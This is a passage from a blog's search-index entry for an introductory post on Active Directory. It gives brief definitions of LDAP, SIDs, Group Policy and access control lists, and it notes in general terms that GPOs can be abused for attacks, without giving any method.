is based on the Lightweight Directory Access Protocol (LDAP). This protocol provides a common language for clients and servers to speak to one another.\nSID: Security Identifer is a unique ID that the Domain Controller uses to identify user, group, computer on a DC network.\nGroup Policy (GPO): The Group Policy provides the ability to manage configuration and changes easily in AD.\nConfiguration like:  Security settings. Registry-based policy settings. Group policy preferences like startup/shutdown/log-on/log-off/script settings. Software installation.  The GPO can be abused for various attacks like privesc, backdoors, persistence etc.\nAccess Control Model: Its the ability of control the proccess to access objects and resourses in Active directory based on.\n Access Token : Security context of a process (identity and privs of user). Security Descriptors : SID of the owner, Discretionary ACL (DACL), System ACL (SACL).  Access Control List (ACL): Its a list of access control entries (ACE), ACE corresponds to individual permission or audits access, who has permission and what can be done on an object?\nDiscretionary ACL (DACL): The list of permission that who have the permission to access the object.\nSystem ACL (SACL): logs success and failure audit messages when an object is accessed.\nI hope its useful see you in the next part \u0026lt;3 .\n","date":"15 Feb, 2021","image":"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\u003cpicture\u003e\n  \u003csource srcset=\"/images/post/intro_hu47128ddc5c83589eff2ea06e01bb9cc3_90158_545x0_resize_box_2.png\" media=\"(max-width: 575px)\"\u003e\n  \u003csource srcset=\"/images/post/intro_hu47128ddc5c83589eff2ea06e01bb9cc3_90158_600x0_resize_box_2.png\" media=\"(max-width: 767px)\"\u003e\n  \u003csource srcset=\"/images/post/intro_hu47128ddc5c83589eff2ea06e01bb9cc3_90158_700x0_resize_box_2.png\" media=\"(max-width: 991px)\"\u003e\n  \u003csource srcset=\"/images/post/intro_hu47128ddc5c83589eff2ea06e01bb9cc3_90158_1110x0_resize_box_2.png\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" class=\"w-100 img-fluid rounded\" src=\"/images/post/intro_hu47128ddc5c83589eff2ea06e01bb9cc3_90158_1110x0_resize_box_2.png\" alt=\"\" width=\"728\" height=\"410\"\u003e\n\u003c/picture\u003e\n \n \n \n\n","permalink":"https://dragonpwn.github.io/blog/active-directory-intro/","tags":["Network","Active-Directory"],"title":"Introduction to Active Directory"}]